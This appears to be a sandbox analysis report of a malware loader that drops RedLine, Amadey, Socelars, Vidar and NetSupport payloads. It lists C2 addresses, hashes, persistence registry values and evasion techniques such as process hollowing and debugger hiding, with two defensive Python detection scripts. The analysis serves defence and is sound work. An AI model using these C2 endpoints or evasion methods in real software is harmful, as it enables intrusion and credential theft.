Analysis
max time kernel: 727s
max time network: 1812s
platform: windows11_x64
resource: win11
submitted: 13-11-2021 17:35
Static task
static1
Behavioral tasks (each runs the same sample, setup_x86_x64_install.exe)
behavioral1: win7-ja-20211014
behavioral2: win7-en-20211104
behavioral3: win7-de-20211014
behavioral4: win11
behavioral5: win10-ja-20211014
behavioral6: win10-en-20211104
The results below are from the win11 run (behavioral4); the memory-dump YARA matches are prefixed behavioral4/ accordingly.
General
Target: setup_x86_x64_install.exe
Size: 9.1MB
MD5: 0ccaba8f07f43baba600ee09864dd488
SHA1: fc6205c186b040cd6b2c30e1c4f161ec2eea2a47
SHA256: cf878de150bbfc29baab8635e159bb2733e63f1dbd954374258a55ee73982f0a
SHA512: 3f7602933e91c3b06f44821ae8706b6ab25389dbddeb7f28fc89ba4e84b234ff759ac8b6062fccbf565860302ec59884333115cb22dbedf66bd2bdc77d06db6e
Malware Config
Extracted: socelars
  C2: http://www.hhgenice.top/
Extracted: amadey
  Version: 2.82
  C2: 185.215.113.45/g4MbvE/index.php
Extracted: redline
  Botnet: media13111
  C2: 91.121.67.60:51630
Three families with separate C2 infrastructure were extracted from one installer, which is the pattern of a pay-per-install loader delivering several customers' payloads; the dropped-EXE and YARA sections below show the individual stages.
Signatures
NetSupport
NetSupport is a remote access tool sold as legitimate system administration software. Its client executable, client32.exe (pid 11424), appears under "Loads dropped DLL" below, so the RAT was dropped and launched by this sample rather than being part of the machine image.
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro. Here the parent is the WMI provider host: a process created through WMI (Win32_Process.Create) gets wmiprvse.exe as its parent, so the likelier reading is that one of the dropped payloads launched rundll32.exe via WMI to detach it from its own process tree. One of these children, pid 6536, also appears under "Blocklisted process makes network request" (flow 247).
Processes (description / pid / pid_target / process; pid_target 4908 is the wmiprvse.exe parent in every row):
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   1652    4908   rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   8060    4908   rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   6536    4908   rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   10216   4908   rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   5752    4908   rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   16504   4908   rundll32.exe
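The check behind this signature, as an added example rather than code from the report or from Hatching Triage: a parent/child allow-list applied to process-creation events. The events are constructed to mirror the six rows above (wmiprvse.exe, pid 4908, spawning rundll32.exe) plus three controls; the expected-parent table, the control parent paths and the WMI-host rule are assumptions to tune per environment.

```python
"""Flag process-creation events whose parent is not expected for the child.

Added example for the signature above; it is not code from the sandbox
report or from Hatching Triage. The event records are constructed to
mirror the report's rows (wmiprvse.exe, pid 4908, spawning six
rundll32.exe children) plus three controls; the expected-parent table is
an assumption a team would tune to its own environment.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # file name of the new process
    parent_image: str   # full path of the parent process


# Assumed baseline: parents that normally launch these living-off-the-land
# binaries; any other parent is reported.
EXPECTED_PARENTS = {
    "rundll32.exe": {"explorer.exe", "svchost.exe", "cmd.exe", "msiexec.exe",
                     "powershell.exe", "userinit.exe"},
    "powershell.exe": {"explorer.exe", "cmd.exe", "svchost.exe"},
    "mshta.exe": {"explorer.exe"},
}

# The WMI provider host only creates children on behalf of a WMI caller
# (Win32_Process.Create), which hides the real parent: report every child.
ALWAYS_REPORT_PARENTS = {"wmiprvse.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, so full paths and bare names compare."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_unexpected_child(ev: ProcEvent) -> Optional[str]:
    """A finding in the report's wording, or None when the pair is normal."""
    parent = basename(ev.parent_image)
    child = basename(ev.image)
    if parent in ALWAYS_REPORT_PARENTS:
        return (f"Parent {ev.parent_image} is not expected to spawn this process "
                f"({ev.image}, pid {ev.pid}, parent pid {ev.ppid})")
    allowed = EXPECTED_PARENTS.get(child)
    if allowed is not None and parent not in allowed:
        return (f"{ev.image} (pid {ev.pid}) started by unusual parent "
                f"{ev.parent_image} (pid {ev.ppid})")
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """All findings as (child pid, message), in event order."""
    findings = []
    for ev in events:
        msg = flag_unexpected_child(ev)
        if msg is not None:
            findings.append((ev.pid, msg))
    return findings


def children_by_parent(events: List[ProcEvent]) -> Dict[int, List[int]]:
    """Flagged children grouped by parent pid: six rundll32.exe from one
    wmiprvse.exe is a stronger signal than one stray child."""
    flagged = {pid for pid, _ in scan(events)}
    groups: Dict[int, List[int]] = defaultdict(list)
    for ev in events:
        if ev.pid in flagged:
            groups[ev.ppid].append(ev.pid)
    return dict(groups)


WMI_HOST = r"C:\Windows\system32\wbem\wmiprvse.exe"

# Constructed events: the six report rows, then three controls.
SAMPLE_EVENTS = [
    ProcEvent(1652, 4908, "rundll32.exe", WMI_HOST),
    ProcEvent(8060, 4908, "rundll32.exe", WMI_HOST),
    ProcEvent(6536, 4908, "rundll32.exe", WMI_HOST),
    ProcEvent(10216, 4908, "rundll32.exe", WMI_HOST),
    ProcEvent(5752, 4908, "rundll32.exe", WMI_HOST),
    ProcEvent(16504, 4908, "rundll32.exe", WMI_HOST),
    # expected parent: not reported
    ProcEvent(4242, 1000, "rundll32.exe", r"C:\Windows\explorer.exe"),
    # cmd.exe has no expected-parent entry, so it is not judged at all
    ProcEvent(5192, 3176, "cmd.exe",
              r"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exe"),
    # assumed parent path: a document viewer launching rundll32.exe
    ProcEvent(7777, 3003, "rundll32.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
]

if __name__ == "__main__":
    for pid, message in scan(SAMPLE_EVENTS):
        print(pid, message)
    print(children_by_parent(SAMPLE_EVENTS))
```

The grouping step is the useful part in practice: a single rundll32.exe under wmiprvse.exe can be a monitoring agent, while six of them in one run from the same parent pid is the loader pattern this report shows. Tune EXPECTED_PARENTS from your own process-creation telemetry before relying on the second rule.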
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 2 IoCs (YARA rule family_redline)
  behavioral4/memory/5412-327-0x0000000000000000-mapping.dmp
  behavioral4/memory/5412-329-0x0000000000400000-0x0000000000420000-memory.dmp
Pid 5412 is the second instance of Sat16066e28b50208.exe, the child that its parent (pid 4900) wrote into with SetThreadContext (see "Suspicious use of SetThreadContext" below); the match in the 0x400000 image region is the unpacked RedLine payload inside the hollowed child.
Socelars Payload 2 IoCs (YARA rule family_socelars, matched twice on the same file)
  C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat160ff2e199851.exe
This is one of the components unpacked from the 7-Zip SFX staging directory; it ran as pid 4552 and later crashed (see "Program crash").
Suspicious use of NtCreateProcessExOtherParentProcess 34 IoCs
Processes (description / pid / process / target process):
  PID 5332 created 5192     5332   WerFault.exe   cmd.exe
  PID 2276 created 4552     2276   WerFault.exe   WerFault.exe
  PID 6444 created 5028     6444   LzmwAqmV.exe
  PID 6368 created 3676     6368   WerFault.exe   Chrome5.exe
  PID 6120 created 5452     6120   tkools.exe
  PID 7100 created 1100     7100   WerFault.exe   OblbIZVPY7a0tO5Oh7yjmZQL.exe
  PID 3240 created 2216     3240   WerFault.exe   Worldoffer.exe
  PID 6452 created 6564     6452   WerFault.exe   ey4uvXWEOUalkU_eykdaluyu.exe
  PID 6120 created 1628     6120   Xf_zx9O1XjyURUhCmLjojbZL.exe
  PID 7016 created 6580     7016   WerFault.exe   chrome.exe
  PID 5124 created 7040     5124   WerFault.exe   chrome update.exe
  PID 3788 created 5048     3788   WerFault.exe   chrome1.exe
  PID 7052 created 7084     7052   setup.exe
  PID 5124 created 3568     5124   WerFault.exe   WerFault.exe
  PID 7344 created 6812     7344   WerFault.exe   rundll32.exe
  PID 2588 created 5028     2588   WerFault.exe   LzmwAqmV.exe
  PID 5960 created 2616     5960   WerFault.exe   rGwY69WmOM_qqsBGjBQCwu70.exe
  PID 8068 created 5288     8068   WerFault.exe   WBGMEjP2ZOPhKrFm3D2PsxK2.exe
  PID 6368 created 2396     6368   WerFault.exe   B9fyo7QqeK801elsQ3zzApZx.exe
  PID 6952 created 3532     6952   WerFault.exe   I43HlxEfzYdBanh5sTg7Y_zX.exe
  PID 4060 created 4056     4060   WerFault.exe   PQBJTAaQtTewucBijOxkjY_l.exe
  PID 6288 created 3560     6288   WerFault.exe   UiCHUYf2DCZO0cVtFmpt1M5s.exe
  PID 2740 created 6628     2740   WerFault.exe   rundll32.exe
  PID 5520 created 720      5520   AC5A.exe       41QX82bYGlA3Bkj6dsFQtiUV.exe
  PID 784 created 2192      784    WerFault.exe   vg9O1s8jU7nNIaD25edzyuif.exe
  PID 2200 created 8084     2200   WerFault.exe   C292.exe
  PID 10308 created 10244   10308  WerFault.exe   rundll32.exe
  PID 11096 created 8840    11096  WerFault.exe   34D6.exe
  PID 12384 created 12316   12384  WerFault.exe   rundll32.exe
  PID 13564 created 12300   13564  WerFault.exe   build.exe
  PID 13636 created 12232   13636  WerFault.exe   ganfarm.exe
  PID 16092 created 12040   16092  WerFault.exe   D938.exe
  PID 16632 created 16516   16632  WerFault.exe   rundll32.exe
  PID 19280 created 18908   19280  WerFault.exe   srvs.exe
The 29 WerFault.exe rows are Windows Error Reporting starting its handler with the faulting process assigned as the handler's parent, which is exactly what this signature looks for; the second pid in each of those rows is a crashing process listed under "Program crash" below, so they are a side effect of the payloads crashing, not parent-pid spoofing by the malware. The five rows whose process is not WerFault.exe (LzmwAqmV.exe, tkools.exe, Xf_zx9O1XjyURUhCmLjojbZL.exe, setup.exe and AC5A.exe) are the ones to triage, since a dropped payload has no benign reason to create a process under a parent other than itself.
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
The Amadey rule corresponds to the extracted Amadey C2 (185.215.113.45/g4MbvE/index.php), and the GCleaner rule to gcleaner.exe, which appears below hollowing a copy of itself. The Nemucod, "single char EXE" and "terse alphanumeric downloader" rules key on the shape of the download request rather than on a family, so expect them on any loader fetching second stages.
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Vidar Stealer 1 IoCs (YARA rule family_vidar)
  behavioral4/memory/2216-528-0x00000000022A0000-0x0000000002375000-memory.dmp
Pid 2216 appears twice under "Executes dropped EXE" (Sat1612020d5c.exe, then Worldoffer.exe after pid reuse); Worldoffer.exe is also the one that crashed, so the match most likely belongs to it.
YARA rule aspack_v212_v242 (ASPack-packed dropped DLLs)
  C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurl.dll (matched twice)
  C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurlpp.dll (matched twice)
  C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libstdc++-6.dll (matched twice)
Blocklisted process makes network request 43 IoCs
Processes (flow / pid / process):
  203    5816   msiexec.exe
  247    6536   rundll32.exe (one of the six rundll32.exe instances spawned through wmiprvse.exe above)
  1142   12460  powershell.exe
  1256, 1262, 1276, 1289, 1301, 1308, 1314, 1321, 1332, 1344, 1357, 1377, 1389, 1401, 1403, 1412, 1420, 1427, 1433, 1437, 1443, 1460, 1474, 1483, 1490, 1496, 1504, 1511, 1517, 1522, 1531, 1544, 1555, 1563, 1581, 1589, 1595, 1602, 1607, 1615   12896   MsiExec.exe (40 flows from one installer process)
Downloads MZ/PE file
Drops file in Drivers directory 3 IoCs
  File opened for modification   C:\Windows\system32\drivers\etc\hosts   lakazet.exe (three times)
An installer has no benign reason to write the hosts file; the usual purpose is to block security-vendor and update domains or to redirect traffic. The report does not show the entries written, so pull the file from the run to see which names were pinned.
Executes dropped EXE 64 IoCs
Processes (pid / process):
  2184 setup_installer.exe
  3176 setup_install.exe
  3800 Sat16dbfd538b0b.exe
  3060 Sat1600f41eca.exe
  3692 Sat162b769f285d4a78.exe
  5016 Sat163af1aa81.exe
  1476 Sat169c60f22b8.exe
  2092 Sat16862c2e159d0a4.exe
  5028 Sat1682c535a6fcb6e7.exe
  4900 Sat16066e28b50208.exe
  4152 Sat16af470129.exe
  4828 Sat163b771375.exe
  4552 Sat160ff2e199851.exe
  4544 Sat1624bfc23ff9f.exe
  2216 Sat1612020d5c.exe
  2932 Sat1624bfc23ff9f.exe
  1432 Sat1637cdb9d96.exe
  3676 Sat16156abf9c.exe
  2696 Sat163b771375.exe
  5044 Sat169c60f22b8.tmp
  2196 Sat16af470129.tmp
  2144 Sat169c60f22b8.exe
  5268 Sat169c60f22b8.tmp
  5452 tkools.exe
  5536 lakazet.exe
  5412 Sat16066e28b50208.exe
  5816 6836899.exe
  5896 856814.exe
  5984 AhWVemGiKw7SpgUWHHpZkjyt.exe
  5944 Conhost.exe
  6048 AhWVemGiKw7SpgUWHHpZkjyt.exe
  5132 Conhost.exe
  2996 SoftwareInstaller2191.exe
  5660 TyIOGZL_DGrJm.EXe
  5484 5377420.exe
  5340 AppLaunch.exe
  2216 Worldoffer.exe
  1284 SPbqmysrbDmwN9BKwv6anVMQ.exe
  5336 vrDet9OfjstR25razE2Nylyc.exe
  2240 UeuBMbC_JvHWFwRUeq1Z4yhO.exe
  1628 Xf_zx9O1XjyURUhCmLjojbZL.exe
  1676 9osAN_jHjbdtS1wgTHVWBnwP.exe
  3560 UiCHUYf2DCZO0cVtFmpt1M5s.exe
  3532 I43HlxEfzYdBanh5sTg7Y_zX.exe
  2616 rGwY69WmOM_qqsBGjBQCwu70.exe
  3568 WerFault.exe
  2396 B9fyo7QqeK801elsQ3zzApZx.exe
  4056 PQBJTAaQtTewucBijOxkjY_l.exe
  6028 uNllGlcbm2GVjpyTbg93jDn7.exe
  2032 7PEDuinOLwXYX_6iGkQn8Cc8.exe
  1572 fBp6HqC0_TNfSR_tIpttHvQC.exe
  1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe
  1892 J9zM_BwL31SvyQCz441NjFE2.exe
  2896 8sTAAiYk2sEOrXXjfesKoFdn.exe
  5288 WBGMEjP2ZOPhKrFm3D2PsxK2.exe
  3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe
  6240 4172725.exe
  6252 kwpQoqQ0RdrnOPfE49tQ0tRM.tmp
  6464 inst2.exe
  6556 netsh.exe
  6564 ey4uvXWEOUalkU_eykdaluyu.exe
  6572 jg1_1faf.exe
  6592 cm3.exe
  6604 8379179.exe
The Sat16... names are the components unpacked from the 7-Zip SFX stage (the 7zS88821CC3 directory); the random 24-character names (AhWVemGiKw7SpgUWHHpZkjyt.exe and similar) and the seven-digit names (5377420.exe and similar) are later stages. Entries that reuse Windows binary names (Conhost.exe, WerFault.exe, netsh.exe, AppLaunch.exe) need checking against their file path: "Conhost.exe" pid 5132 goes on to query BIOS strings and hide its threads from the debugger below, behaviour the real console host never shows, so at least that one is a masquerading payload. Pids are reused within the run (2216 is listed as both Sat1612020d5c.exe and Worldoffer.exe), so join on pid and start time, not pid alone.
Modifies Windows Firewall 1 TTPs
Sets service image path in registry 2 TTPs
The netsh.exe instance (pid 6556) under "Executes dropped EXE" is the likely vehicle for the firewall change, and PowerControl_Svc.exe under "Drops file in Program Files directory" the likely service image; neither the rule nor the service name is shown in this report.
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: each of the following queried both \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion and \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (15 processes, 30 reads):
  5377420.exe, ganfarm.exe, vrDet9OfjstR25razE2Nylyc.exe, D138.exe, UeuBMbC_JvHWFwRUeq1Z4yhO.exe, 8412671.exe, Ww.exe, Conhost.exe, Xf_zx9O1XjyURUhCmLjojbZL.exe, 4172725.exe, 2325315.exe, 5011017.exe, build.exe, 8069537.exe, 7646913.exe
Both values carry the hypervisor's firmware strings (for example VBOX or VMware), which is why they are read as a pair. Nearly the same set of processes reads the UAC EnableLUA value and calls NtSetInformationThread(ThreadHideFromDebugger) further down, which points to a shared packer or loader stub rather than fifteen unrelated payloads.
Loads dropped DLL 64 IoCs
Processes (pid / process / number of dropped DLLs loaded):
  3176 setup_install.exe (5)
  5044 Sat169c60f22b8.tmp (1)
  2196 Sat16af470129.tmp (1)
  5268 Sat169c60f22b8.tmp (1)
  5192 cmd.exe (1)
  4308 Calculator Installation.exe (5)
  6252 kwpQoqQ0RdrnOPfE49tQ0tRM.tmp (1)
  3660 Sg5zNg8pvLcFbf509SrSiImk.exe (3)
  6812 rundll32.exe (1)
  8160 rundll32.exe (2)
  1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe (10)
  6224 mt1GBIsJD_LSfQtJhR6C12ul.tmp (1)
  3708 setup.exe (2)
  7356 rundll32.exe (2)
  6628 rundll32.exe (1)
  5760 setup.exe (2)
  5816 msiexec.exe (2)
  7140 rundll32.exe (2)
  860 rundll32.exe (2)
  6864 installer.exe (3)
  10244 rundll32.exe (1)
  10608 MsiExec.exe (2)
  11424 client32.exe (6)
  12072 Done.exe (1)
  12316 rundll32.exe (1)
  12896 MsiExec.exe (5)
client32.exe is the NetSupport Manager client, which is what the NetSupport signature at the top refers to; its six loads are most likely the support libraries bundled with it. The rundll32.exe entries are dropped DLLs being run directly, and four of those instances (6812, 6628, 10244, 12316) also appear under "Program crash".
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Both behaviours are consistent with the RedLine and Vidar payloads identified by YARA above; both families collect browser credentials and wallet files.
Adds Run key to start application 2 TTPs 8 IoCs
Processes (action / key = value / writer):
  Key created       \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run   setup.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD"   setup.exe
  Set value (str)   \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"   856814.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\Camejogufu.exe\""   lakazet.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Jaqewuvuhae.exe\""   lakazet.exe
  Key created       \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run   msedge.exe
  Key created       \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run   setup.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD"   setup.exe
Three persistence entries are established: a machine-wide Run value "Calculator" pointing into the user's AppData\Roaming (written twice by setup.exe, i.e. two setup.exe instances), a per-user Run value "WinHost" for WinHoster.exe in AppData\Roaming, and a machine-wide RunOnce value "system recover" that lakazet.exe sets twice with different targets, so only the second (Jaqewuvuhae.exe under Windows Mail) survives. Both RunOnce targets are executables lakazet.exe dropped into Program Files directories (see "Drops file in Program Files directory"). The msedge.exe row only creates or opens the per-user Run key without setting a value.
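How an analyst would triage rows like the ones above automatically, as an added example that is not code from the report or from Hatching Triage: parse the registry write, pull the image path out of the command line, and flag by location and naming. The rows below are constructed in the report's own row format with the values copied from this section plus one benign control; the directory lists and the "deceptive name" word list are assumptions.

```python
"""Triage autostart registry writes by where the launched image lives.

Added example for the Run-key rows above; it is not code from the report
or from Hatching Triage. The rows are constructed in the report's own
'Set value (str) <key> = "<value>" <writer>' shape with values copied from
the page plus one benign control; the location and naming heuristics are
assumptions.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class Autorun(NamedTuple):
    key: str                    # registry key including the value name
    image: str                  # executable the value launches
    args: str                   # remaining command line
    writer: str                 # process that wrote the value
    reasons: Tuple[str, ...]    # why it was flagged; empty means nothing found


# Only 'Set value' rows carry a command; 'Key created' rows do not.
_SET_ROW = re.compile(r'^Set value \(str\) (?P<key>.+?) = "(?P<val>.*)" (?P<writer>\S+)$')

# Assumed heuristics.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\programdata\\",
                 "\\temp\\", "\\users\\public\\")
WINDOWS_COMPONENT_DIRS = ("\\windows nt\\", "\\windows mail\\", "\\windows defender\\",
                          "\\windows media player\\")
DECEPTIVE_WORDS = ("system", "recover", "update", "host", "security")


def unescape(val: str) -> str:
    """Report values are escaped: a doubled backslash and backslash-quote."""
    return val.replace('\\"', '"').replace("\\\\", "\\")


def split_command(cmd: str) -> Tuple[str, str]:
    """Image path and arguments; a quoted image keeps its spaces, otherwise
    the image ends at the first '.exe'."""
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    m = re.match(r"(?is)(.*?\.exe)\s*(.*)", cmd)
    if m:
        return m.group(1), m.group(2)
    return cmd, ""


def parse_row(line: str) -> Optional[Autorun]:
    m = _SET_ROW.match(line.strip())
    if m is None:
        return None
    key = m.group("key")
    image, args = split_command(unescape(m.group("val")))
    value_name = key.rsplit("\\", 1)[-1].lower()
    low_image, low_key = image.lower(), key.lower()
    reasons = []
    if any(d in low_image for d in USER_WRITABLE):
        reasons.append("image in user-writable directory")
    if any(d in low_image for d in WINDOWS_COMPONENT_DIRS):
        reasons.append("image dropped into a Windows component directory")
    if any(w in value_name for w in DECEPTIVE_WORDS):
        reasons.append("value name imitates a system component")
    if "\\runonce\\" in low_key and "\\machine\\" in low_key:
        reasons.append("machine-wide RunOnce key (HKLM)")
    return Autorun(key, image, args, m.group("writer"), tuple(reasons))


def triage(lines: List[str]) -> List[Autorun]:
    """Every parsed autorun value, flagged or not."""
    return [a for a in map(parse_row, lines) if a is not None]


def flagged(lines: List[str]) -> List[Autorun]:
    return [a for a in triage(lines) if a.reasons]


# Constructed rows: the eight report rows in order, then one benign control.
SAMPLE_ROWS = [
    r'Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD" setup.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 856814.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\Camejogufu.exe\"" lakazet.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Jaqewuvuhae.exe\"" lakazet.exe',
    r'Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe',
    r'Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD" setup.exe',
    # control (constructed): a System32 image registered by explorer.exe
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RtkAudUService = "C:\\Windows\\System32\\RtkAudUService64.exe" explorer.exe',
]

if __name__ == "__main__":
    for a in flagged(SAMPLE_ROWS):
        print(a.writer, "->", a.image, a.args, "|", "; ".join(a.reasons))
```

The user-writable-directory rule on its own produces false positives (OneDrive and several updaters legitimately start from AppData), which is why the writer is carried through: a Run value written by a process that itself ran from Temp, as setup.exe did here, is a different case from one written by a signed installer.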
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Reads the UAC policy value EnableLUA 15 IoCs
Processes: each of the following queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA once:
  5011017.exe, 7646913.exe, 8412671.exe, UeuBMbC_JvHWFwRUeq1Z4yhO.exe, build.exe, D138.exe, ganfarm.exe, 4172725.exe, vrDet9OfjstR25razE2Nylyc.exe, 8069537.exe, 2325315.exe, jg1_1faf.exe, Ww.exe, Xf_zx9O1XjyURUhCmLjojbZL.exe, 5377420.exe
A payload reads EnableLUA to decide whether it needs a UAC bypass or can write to HKLM directly. This is the BIOS-fingerprinting set from above with one swap (jg1_1faf.exe appears here, Conhost.exe does not).
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes (File opened (read-only) \??\<letter>:):
  rvs.exe: A, E, G, H, J, K, L, N, Q, R, S, T, U, V, W, X, Y, Z (18 opens)
  msiexec.exe (three instances): A, B, E, F, G, H, I, J, K, L, M, N, O, P, Q, S, T, U, V, W, X, Y, several letters opened more than once (36 opens)
  installer.exe: E, F, G, I, M, N, S, T, W, Y (10 opens)
Windows Installer walks every volume for disk costing, so the msiexec.exe and installer.exe rows are expected installer behaviour. rvs.exe is the one to look at: it has no installer role anywhere in this report and probes every drive letter, which is the behaviour the "Enumerates physical storage devices" signature below describes.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Flows (flow / ioc): 1 ipinfo.io, 7 ip-api.com, 47 ipinfo.io, 48 ipinfo.io, 144 ipinfo.io, 193 ipinfo.io, 218 ipinfo.io, 218 ip-api.com, 257 ipinfo.io
Nine lookups from one host in one run means several payloads each did their own geolocation check; ipinfo.io or ip-api.com requested by anything other than a browser is a cheap network detection for this whole bundle.
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes (pid / process):
  5132 Conhost.exe
  5484 5377420.exe
  6240 4172725.exe
  5336 vrDet9OfjstR25razE2Nylyc.exe
  2240 UeuBMbC_JvHWFwRUeq1Z4yhO.exe
  5160 7646913.exe
  800 8069537.exe
  4276 8412671.exe
  6676 5011017.exe
  7584 2325315.exe
  11908 D138.exe
  12452 Ww.exe
NtSetInformationThread with ThreadHideFromDebugger (information class 0x11) stops the kernel from delivering that thread's debug events, so an attached debugger silently loses it; an installer has no legitimate use for it. The twelve callers are a subset of the fifteen BIOS-fingerprinting processes above.
Suspicious use of SetThreadContext 14 IoCs
Processes (description / pid / process / target process):
  PID 4544 set thread context of 2932     4544    Sat1624bfc23ff9f.exe           Sat1624bfc23ff9f.exe
  PID 4900 set thread context of 5412     4900    Sat16066e28b50208.exe          Sat16066e28b50208.exe
  PID 1628 set thread context of 5340     1628    Xf_zx9O1XjyURUhCmLjojbZL.exe   AppLaunch.exe
  PID 1284 set thread context of 7080     1284    SPbqmysrbDmwN9BKwv6anVMQ.exe   SPbqmysrbDmwN9BKwv6anVMQ.exe
  PID 2896 set thread context of 8076     2896    8sTAAiYk2sEOrXXjfesKoFdn.exe   8sTAAiYk2sEOrXXjfesKoFdn.exe
  PID 1572 set thread context of 6316     1572    fBp6HqC0_TNfSR_tIpttHvQC.exe   fBp6HqC0_TNfSR_tIpttHvQC.exe
  PID 35804 set thread context of 5520    35804   AC5A.exe                       AC5A.exe
  PID 3848 set thread context of 7964     3848    gcleaner.exe                   gcleaner.exe
  PID 35136 set thread context of 8624    35136   conhost.exe                    explorer.exe
  PID 5804 set thread context of 9844     5804    4BF9.exe                       4BF9.exe
  PID 7748 set thread context of 11528    7748    E444.exe                       E444.exe
  PID 12300 set thread context of 7004    12300   build.exe                      AppLaunch.exe
  PID 12232 set thread context of 13284   12232   ganfarm.exe                    AppLaunch.exe
  PID 12484 set thread context of 13216   12484   Radiophony.exe                 Radiophony.exe
Writing another process's thread context is the last step of process hollowing (RunPE): the loader starts the target suspended, maps its real payload over the image, points the primary thread at the new entry point and resumes it. Ten rows target a fresh copy of the loader itself; three target AppLaunch.exe, the .NET host commonly used for C# payloads (the RedLine YARA match above is in pid 5412, the hollowed child of Sat16066e28b50208.exe); one writes into explorer.exe from a process calling itself conhost.exe. The memory to dump for unpacked payloads is therefore the target pid of each row, not the source.
